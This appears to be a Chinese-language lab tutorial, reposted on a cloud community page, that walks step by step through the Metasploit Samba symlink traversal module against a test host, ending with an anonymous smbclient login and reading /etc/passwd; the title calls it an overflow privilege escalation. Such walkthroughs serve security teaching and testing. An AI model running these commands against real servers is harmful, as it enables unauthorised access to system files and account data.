Metasploit溢出samba提權漏洞

來源:互聯網
上載者:User

標籤:程式   server   search   admin   軟串連   

    Samba是一套實現SMB(server messages block)協議,跨平台進行檔案分享權限設定和列印共用服務的程式,samba的sambd預設配置在可寫檔案分享權限設定時,存在目錄遍曆漏洞,遠端使用者可以通過smbclient端使用一個對稱命,建立一個包含..的目錄遍曆符的軟串連 ,可以進行目錄遍曆以及訪問任意檔案。

 

一、利用nmap工具掃描目標主機

1.1使用nmap命令對目標主機進行掃描。單擊案頭空白處,右鍵菜單選擇“在終端中開啟”。

650) this.width=650;" src="http://s5.51cto.com/wyfs02/M01/8B/58/wKiom1hKI0nhGMIGAAFvegZRn6c658.jpg" style="float:none;" title="1.jpg" alt="wKiom1hKI0nhGMIGAAFvegZRn6c658.jpg" />


1.3在終端中輸入命令“msfconsole”,啟動MSF終端。

1.4在終端中輸入命令“search samba”,搜尋samba的相關工具和攻擊載荷。

1.5在終端中輸入命令“use auxiliary/admin/smb/samba_symlink_traversal”,啟用漏洞利用模組, 提示符就會提示進入到該路徑下。

650) this.width=650;" src="http://s5.51cto.com/wyfs02/M01/8B/55/wKioL1hKI0vTI0b8AAKbcGWajOQ570.jpg" style="float:none;" title="2.jpg" alt="wKioL1hKI0vTI0b8AAKbcGWajOQ570.jpg" />


1.6在終端中輸入命令“info”,查看需要設定的相關項目,“yes”表示必須填寫的參數。

650) this.width=650;" src="http://s1.51cto.com/wyfs02/M00/8B/58/wKiom1hKI0zyDOe9AAEHJsgK8Q4143.jpg" style="float:none;" title="3.jpg" alt="wKiom1hKI0zyDOe9AAEHJsgK8Q4143.jpg" />


1.7在終端中輸入命令“set RHOST 192.168.1.3”,設定目標主機的IP地址。

1.8在終端中輸入“set SMBSHARE tmp”, 設定SAM可寫檔案。

1.9在終端中輸入“exploit”, 開始攻擊。

1.10新開啟一個終端,輸入“smbclient //192.168.1.3/tmp”,直接斷行符號,不用輸入密碼。

650) this.width=650;" src="http://s1.51cto.com/wyfs02/M00/8B/55/wKioL1hKI0zA_vCjAABbeOqV9PI188.jpg" style="float:none;" title="4.jpg" alt="wKioL1hKI0zA_vCjAABbeOqV9PI188.jpg" />


1.11在終端中輸入“cd rootfs”, 進入rootfs目錄,在終端下輸入命令“ls”,列出目錄。


1.12在終端中輸入“more /etc/passwd”, 查看目標主機系統中的密碼。

650) this.width=650;" src="http://s1.51cto.com/wyfs02/M02/8B/58/wKiom1hKI03yl_DnAACw2l6usRw373.jpg" style="float:none;" title="5.jpg" alt="wKiom1hKI03yl_DnAACw2l6usRw373.jpg" />

650) this.width=650;" src="http://s4.51cto.com/wyfs02/M02/8B/55/wKioL1hKI07gv6ewAAEVT_rK9eE042.jpg" style="float:none;" title="6.jpg" alt="wKioL1hKI07gv6ewAAEVT_rK9eE042.jpg" />


Metasploit溢出samba提權漏洞

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.